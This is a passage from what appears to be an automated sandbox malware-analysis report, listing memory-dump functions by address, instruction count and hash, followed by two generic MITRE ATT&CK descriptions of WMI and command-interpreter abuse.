Instruction Fuzzy Hash: C6214C1170DB5C0FE765B66868655757BD1EF9A220B0905FBE48CC31E3DC09A9458342

Function 00007FFD9B973CCB Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2983275cdbfbd88f24085a51efe2c33e0aed5bb1f3ac837278c7fc648bdfea7a
Instruction ID: 285b07abc973ea55df6397729729a155a9df4c3c04a5d9bd468bda59bdeb82ae
Opcode Fuzzy Hash: 2983275cdbfbd88f24085a51efe2c33e0aed5bb1f3ac837278c7fc648bdfea7a
Instruction Fuzzy Hash: 6F21807072CE098FDB98EF1CC465E2577D1FB9C710B1502AEA48AC72A2CA20EC42CB41

Function 00007FFD9BB41118 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a8871ba65cf67da9a6b1c39915d4755aa4b83409ac60a06a1853507f611b32
Instruction ID: b2407f57439b27aa1beeb53b760bbe7f7fda9dea992f5141da7dcef85474995a
Opcode Fuzzy Hash: 16a8871ba65cf67da9a6b1c39915d4755aa4b83409ac60a06a1853507f611b32
Instruction Fuzzy Hash: 2F21BC31B1DE1E5FDBA4EB99C060A62B7E2FF69314B1101B9D44DC36A2DA21FD418B80

Function 00007FFD9BB4F672 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31bb8188a4a9ee4beddddb31e83d3e7bb1fdcda251e65a264f7517c1b350e7b7
Instruction ID: 0556d97441bb892ae84072cab45ae82deb1cf36a2398e2937e83cd4ea7249766
Opcode Fuzzy Hash: 31bb8188a4a9ee4beddddb31e83d3e7bb1fdcda251e65a264f7517c1b350e7b7
Instruction Fuzzy Hash: B231561058E3C61FE79357B499256963FF69E87120B0A41EBD588CE4A7C54D494AC323

Function 00007FFD9BB46015 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b674a24a620a148b0cf4f7e76c6ab4b770769d52c041a20b3f4b81abe5c13f9
Instruction ID: ee6319791b5ece7de90f7aba972e13fb1498a073219f4cb7a8afaf06e846c43b
Opcode Fuzzy Hash: 3b674a24a620a148b0cf4f7e76c6ab4b770769d52c041a20b3f4b81abe5c13f9
Instruction Fuzzy Hash: 8D21D13154EB894FD742DBB888659E97FF1FF9621070A01FBD089CB2B2DA2C9906C751

Function 00007FFD9BB450EE Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e304a72a658edb9955e35a4c1d5d7d235cb839a7d9f24a048e951b31ddb2bcd
Instruction ID: efdb99f86ddbe19be6a24b8d55869f9b1ce5b5e6d293655a52a362ee01662324
Opcode Fuzzy Hash: 5e304a72a658edb9955e35a4c1d5d7d235cb839a7d9f24a048e951b31ddb2bcd
Instruction Fuzzy Hash: 1F21782148F7C60FE7A353B5A8655827FF9AE87130B0E41EBD4C8CE0A3D54E494AC362

Function 00007FFD9BB4B3BB Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6f21a23f3e2639ceb07f4998eb2c038ccc1528783342f55df3b01f50768a0a
Instruction ID: 1db6c3296d9144aab799e164e327c27a0231f106868cb3d2cd0301e0a41de06b
Opcode Fuzzy Hash: 3d6f21a23f3e2639ceb07f4998eb2c038ccc1528783342f55df3b01f50768a0a
Instruction Fuzzy Hash: 61115732B1DF0A4BE7789A5CA025475B3D2FFD4324B01477AD84D832D5DE34F9828280

Function 00007FFD9BB49549 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9df261e1d22677bf59c42a4965ddc4ffaba15964d789524edcb53030d074082
Instruction ID: f907db459e3a04bdae4e9ddfd9bfd2f1270936c1b4c6f132c47c3548f2789396
Opcode Fuzzy Hash: b9df261e1d22677bf59c42a4965ddc4ffaba15964d789524edcb53030d074082
Instruction Fuzzy Hash: 96210731A0E7884FD755DB28D4A86963BE2FFC9358F5501AEE4CDC71F2CA299902C741

Function 00007FFD9BB45E35 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e86409bfcaa9da6de8953667981b71f3c9dc69facaa033da7d286e549e986f
Instruction ID: 26a08535bf00b9d444238d69fe73a26a8621d14b0665ac5b062ca26618a1e023
Opcode Fuzzy Hash: c8e86409bfcaa9da6de8953667981b71f3c9dc69facaa033da7d286e549e986f
Instruction Fuzzy Hash: D2212630A4EF8A4FD756A7B884628E57BA1FF5131074601F6D059C71EBDC2CF9428351

Function 00007FFD9BB4511E Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27311607bbbbfbf4704db1ba218380039a7627972f7b81414be9732131e3619
Instruction ID: ad0d2acad7a8322b286ba22d614d9832c3a28c1fe1e64bd5eb507c3ed01ee5cc
Opcode Fuzzy Hash: f27311607bbbbfbf4704db1ba218380039a7627972f7b81414be9732131e3619
Instruction Fuzzy Hash: 7A21FD4048F7C21EE3A353B4A9655827FF69D8B43070E81EBD5C4CE4A7C58E488BC322

Function 00007FFD9BB507B2 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d46e2bebb3ed00444ab8c616095e9348f0e0dff4e565c824ab193c8326fe8c
Instruction ID: d951320824c4c4c4723402304332093d07013e55efc345e62fcbcb7e092fd913
Opcode Fuzzy Hash: 68d46e2bebb3ed00444ab8c616095e9348f0e0dff4e565c824ab193c8326fe8c
Instruction Fuzzy Hash: 5011726150F7C95FD36783B858245A07FA4BF6772170A41FBD088CB4F3D688594A83A3

Function 00007FFD9BB4F2F5 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c05bbafba9ebd6e1aa0e0261c0104a6a409469fb88752ab7b4925ec66373b2d
Instruction ID: 506213b226fd77a98ace8ffc5baa8b13afeeb715c7473a2e9166c9ac66157f58
Opcode Fuzzy Hash: 6c05bbafba9ebd6e1aa0e0261c0104a6a409469fb88752ab7b4925ec66373b2d
Instruction Fuzzy Hash: 2D11067161D7884FC754CB2884A05E277E2FBD8358F4506BED48DC72E2DE29E9028741

Function 00007FFD9BB437B0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55dcb7a70371170907b06a7cdcae0018666be780cb7cae6d678b9aa794f85d4
Instruction ID: 79ba75dbd50e1cfbb36f5decd2c559b564aaa5e5ccb766c05a82d11f47e8aeb8
Opcode Fuzzy Hash: c55dcb7a70371170907b06a7cdcae0018666be780cb7cae6d678b9aa794f85d4
Instruction Fuzzy Hash: 7711593270B80E4FEB68A66998645B57391FF8436575902BBD40AC71F2DE18DA41C380

Function 00007FFD9BB4E084 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a181f1f1c71bc1a85122364d27588a617d87fbf5ca6af0fd9fbb3c422075de
Instruction ID: 0187086a9d18700e997efba5b393f0b3f55e9733d5588bd610f6aa726fd9e60f
Opcode Fuzzy Hash: c9a181f1f1c71bc1a85122364d27588a617d87fbf5ca6af0fd9fbb3c422075de
Instruction Fuzzy Hash: 61018412B1AC0E0FE7E4F2AC54696F8A3C2FF9821174501B6E44DC32F6DD18AD428380

Function 00007FFD9BB4FE99 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce230b86a414f8ce67820488a6e7f742cc548045887d25a7e4088c53f80fc076
Instruction ID: 10998b1e3074a609154be7beaa18b86c40f068cdbe07cb9768064e2c43267087
Opcode Fuzzy Hash: ce230b86a414f8ce67820488a6e7f742cc548045887d25a7e4088c53f80fc076
Instruction Fuzzy Hash: 8E014531D4D6885FCB029B60A8214E63FB5FF42318B0641D7E44CC71A3C62E5A02C742

Function 00007FFD9BB4EC43 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6683e17389baa8023c6227245286d382e84957f40e9ecdf96d9de9f9b64208
Instruction ID: e766701946f434dfa7f9e4673b33712a049dd09e1dceececf8b813cbf56c3fa0
Opcode Fuzzy Hash: 9f6683e17389baa8023c6227245286d382e84957f40e9ecdf96d9de9f9b64208
Instruction Fuzzy Hash: 4201D832F0994D4FDB54A7A854225FEBBE2FF85211F0601BAD10CC32E3CD5829414381

Function 00007FFD9BB4378E Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af451720e6958ab2e845956737b9f71cb2292ce07a1fb190fb7b30aea03058d1
Instruction ID: b36be73c73a3888624869fe8cdbef5f98f52cda8f8a8ff24e9965be8825b3d9d
Opcode Fuzzy Hash: af451720e6958ab2e845956737b9f71cb2292ce07a1fb190fb7b30aea03058d1
Instruction Fuzzy Hash: D6012662B0F98A0FE76993A948759707BE1BF8521471E00FBD089C70F3CA08AE05C351

Function 00007FFD9BB4ED01 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17ad8ad7ee8096a264de6431cde44a7ef5b045d692c0a0050826f1be468737a
Instruction ID: fa818e74b6a62a3f007d265231ee80f1d8cbcb051c10ca763d21e69841b9c21a
Opcode Fuzzy Hash: e17ad8ad7ee8096a264de6431cde44a7ef5b045d692c0a0050826f1be468737a
Instruction Fuzzy Hash: DD01D62199E6D61FD36A637028674F27FB4FF0222470B41E7D0888B4E3D80D6A878391

Function 00007FFD9BB48B5A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707ce94b9159129a6df5d2b781d4af67d9483edbb679b3d923d747c4d29062d9
Instruction ID: 759b25488e81c280c6f56b2d0581fbffd2737686c0f5b46ceebefa3b7568a489
Opcode Fuzzy Hash: 707ce94b9159129a6df5d2b781d4af67d9483edbb679b3d923d747c4d29062d9
Instruction Fuzzy Hash: ECF0C252B0AD4E0FE7A4A06C38612E563C3FBA42A4F5912A2D01DC72E5EC5968824380

Function 00007FFD9BB460F9 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b57f996a186c1740c6170337ee283a78bd08e07113a032cf811862c3810f901
Instruction ID: 2cc5ad678ef4c2694ff96df3717b5cc59cb6d1fd13e4fc72417eb66d014072f6
Opcode Fuzzy Hash: 1b57f996a186c1740c6170337ee283a78bd08e07113a032cf811862c3810f901
Instruction Fuzzy Hash: E2F0F661D8E6C60FE765577028A38F27BA0BF02318B0B10E6D04A8B8E3C80D66D78391

Function 00007FFD9BB49C79 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6a6d13bc5729cc75522000201459e0485f64375d66170b631d44907e54ea28
Instruction ID: 614bb8fd6c0542c2324e74ccc1ea70a916542ac99d53405f03edeb311208aaed
Opcode Fuzzy Hash: db6a6d13bc5729cc75522000201459e0485f64375d66170b631d44907e54ea28
Instruction Fuzzy Hash: 5EF02B21D8F2D51FE736537528264F27FE0AF42214B0B02E6D09C8B5E3D84C66C38351

Function 00007FFD9BB4F935 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b239bb4bb068a3777dd6a36db8d5dcd24eec7d990d0954416b711a22dba4a1e8
Instruction ID: 91789476e5de2815ca5b5c32e57a2d83017130eb472ff2995556d1c3af0ece40
Opcode Fuzzy Hash: b239bb4bb068a3777dd6a36db8d5dcd24eec7d990d0954416b711a22dba4a1e8
Instruction Fuzzy Hash: 7BF0963190E6CC5FCB12DB6488305957F71BF46304B0941C7E05CCB1A3D629AA19C752

Function 00007FFD9BB492F1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e626b0fe07e2c0c84867d8b3dc8c4634060a85f7061309b577c8a8509294f4
Instruction ID: 3adb0ee3fb351aa4dd048a462909fdd187417998314f19d3f5baa55a93a6360b
Opcode Fuzzy Hash: d4e626b0fe07e2c0c84867d8b3dc8c4634060a85f7061309b577c8a8509294f4
Instruction Fuzzy Hash: 56E02621D2DB950FD7A0A77454AA5D0BBA0FF1520074B04EAC0848B0D7FC19A8408381

Function 00007FFD9BB4D734 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3123a89eb32d41bf7366267e54ec51933d90276e601a81373ae57b3d75a91e
Instruction ID: f2a6cb74187bda6639957e2cb712f20063cabb0cef8ccf414367cdb94a602a70
Opcode Fuzzy Hash: 8a3123a89eb32d41bf7366267e54ec51933d90276e601a81373ae57b3d75a91e
Instruction Fuzzy Hash: AED0A701F1EDAE0ED37162AD18652616ED1EB4512074A40E7C4A8C71A6D44C0D8543C3

Function 00007FFD9BB4385B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a26620813df64872efdcb0df7d24a406a1a77c1f414c6702e6b5224a6ce6d53
Instruction ID: 22c9c8ebb429355f8ced16189d78a729ef79bb0f3f2edb2ed1e92d5c5a96966e
Opcode Fuzzy Hash: 2a26620813df64872efdcb0df7d24a406a1a77c1f414c6702e6b5224a6ce6d53
Instruction Fuzzy Hash: 70C08C11F1E81D0EE5A492DC70501A823C2FB88320B920072D00EC72E9C92C9DC103C0

Function 00007FFD9B971D0A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8310875aca752ab5d2a57f8528f3c106f9eb6ddbf357e06d4b6ec123c49498d
Instruction ID: 7a09ae2aafab6558c3639130fc3a5c56251000b1bbf74f7f7de5d3b95ab080c8
Opcode Fuzzy Hash: a8310875aca752ab5d2a57f8528f3c106f9eb6ddbf357e06d4b6ec123c49498d
Instruction Fuzzy Hash: 5DB01203B8BC1D07944021CD3CC10F89342F7C50767941273E408C0159CC2F49C35242

Non-executed Functions

Function 00007FFD9B8C0B28 Relevance: 4.6, Strings: 3, Instructions: 836COMMON

Download Yara Rule

Strings

7@_I, xrefs: 00007FFD9B8C1004
6@_I, xrefs: 00007FFD9B8C1104
8@_I, xrefs: 00007FFD9B8C0B44

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID: 6@_I$7@_I$8@_I
API String ID: 0-1193174842
Opcode ID: dffe276034184e943fc21b8f9af1224ac73d3bbf3ba9c444431a12370de28450
Instruction ID: 8ccfa8ba5294f161f572eafdb53c6f87eac09954aec224b0da3755a276b54094
Opcode Fuzzy Hash: dffe276034184e943fc21b8f9af1224ac73d3bbf3ba9c444431a12370de28450
Instruction Fuzzy Hash: 0D42C6F3B0F6C50FF775969C28251385F81EF9AA9071901FBD0E88B5FBA815AE068345

Function 000001D6098CB228 Relevance: 2.3, Strings: 1, Instructions: 1070COMMON

Download Yara Rule

Strings

@, xrefs: 000001D6098CB2E3

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c637d99d209d1ca9699a6f6406458f9f86e5ddc939b9afbe853fcc5f8e29eda5
Instruction ID: 7acf2f26e4c297f1c7420aa0af8ecb8f9c2d8b409d158ef65a287cbcbda8ad7a
Opcode Fuzzy Hash: c637d99d209d1ca9699a6f6406458f9f86e5ddc939b9afbe853fcc5f8e29eda5
Instruction Fuzzy Hash: C4727870618F488BDB69DF28D8867E973D2FB98315F144A2FE88AC7245DB34E941CB41

Function 00007FFD9B8BF25E Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

L@_H, xrefs: 00007FFD9B8BF2BF

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID: L@_H
API String ID: 0-3308797280
Opcode ID: 10bfc8391a537db3e15a1c3392bc8c1ab0eba1ef24ee61a636f4318e57c9077e
Instruction ID: 61ec37b1a096a6f254269b946a4d8fdf71a99a5ecacc20e8fb020d577b3a6154
Opcode Fuzzy Hash: 10bfc8391a537db3e15a1c3392bc8c1ab0eba1ef24ee61a636f4318e57c9077e
Instruction Fuzzy Hash: E7910361A0964D4FEB98DBBCD4697E977D1EF89360F0101BAD09AC73D6CD2C18438B41

Function 00007FFD9BB4CC9A Relevance: 1.0, Instructions: 1024COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea94edc38e064fde80adbdfe4b05b5fc590b1b570f692082a35d5feab7a1620
Instruction ID: 4ecc37f9ade4bc97a6a439c6e68de8a7c95614e6f6c6321a354f189f973588b1
Opcode Fuzzy Hash: eea94edc38e064fde80adbdfe4b05b5fc590b1b570f692082a35d5feab7a1620
Instruction Fuzzy Hash: B2522531B0DA4E4FEB68DB5CD4616B5B7E2FF95314B1502BAD44AC71E2DA25FC828380

Function 000001D6098CE4D4 Relevance: .7, Instructions: 730COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f830e609fe5cee47e6c16999e452ce305c1c12be961c10b305ce6362bf0b176d
Instruction ID: 9749fbb99ce821a2af93dcb297d19ad6d67be267868c381b1eec50b66f6d8b71
Opcode Fuzzy Hash: f830e609fe5cee47e6c16999e452ce305c1c12be961c10b305ce6362bf0b176d
Instruction Fuzzy Hash: 4C5249B16043419FE764CF14C844BAAB7EAEF88714F184E2EF9859B292D770ED44CB51

Function 000001D6098C9B40 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629590470d97b874860c088878d19a79a4e01a140465c2e63e0b89389eaa0b6e
Instruction ID: b4a13829f5123cfcc3823d558076be1af663f0b69bc92d7d3a04748578c887ea
Opcode Fuzzy Hash: 629590470d97b874860c088878d19a79a4e01a140465c2e63e0b89389eaa0b6e
Instruction Fuzzy Hash: ABE16571618A498BEB68DF28D8897EEB7E5FB58701F04462FE84AD3340DF31E9118781

Function 00007FFD9B8BAE68 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9106fe330088b509d6f65aeaf2b99cbcd88d4b24626598c27dd863c92c612e
Instruction ID: 4aa3ab6f31c06be9a07320568c205a6f3c2af5afad8d1f1d5abfd603c7324d42
Opcode Fuzzy Hash: ca9106fe330088b509d6f65aeaf2b99cbcd88d4b24626598c27dd863c92c612e
Instruction Fuzzy Hash: D2B11521B0E65D4EE77957B8942427977D1EF8A350F1A03BFE48EC31E2DE1CA8428741

Function 000001D6098CBCDC Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb60552c2100443aaec2c648c47b59461eb5170d6947b4f16a84231dc1554a0
Instruction ID: 967917d00d0b48b49fab4ce03c69419e60b4582b91fb5cabbb160d3a0ab4d2b6
Opcode Fuzzy Hash: 2eb60552c2100443aaec2c648c47b59461eb5170d6947b4f16a84231dc1554a0
Instruction Fuzzy Hash: 4AA13D71518A0C8FDB55EF28C889BEA77E5FB68315F10466FE84AC7260EB30D644CB81

Function 00007FFD9B8C34FA Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560ffbb16fa81afe001e9bcbb6134a861c156aa36d2949c2c6a5dac9aef247f1
Instruction ID: 38da662c2d4379691bdf1d9e4ffba5c583160e2fd384d55222a61c06ff157c37
Opcode Fuzzy Hash: 560ffbb16fa81afe001e9bcbb6134a861c156aa36d2949c2c6a5dac9aef247f1
Instruction Fuzzy Hash: F531D53B60C9565EE309F6BCF8994E87350DFC533A324417BC2A7CA087CE04244786D4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

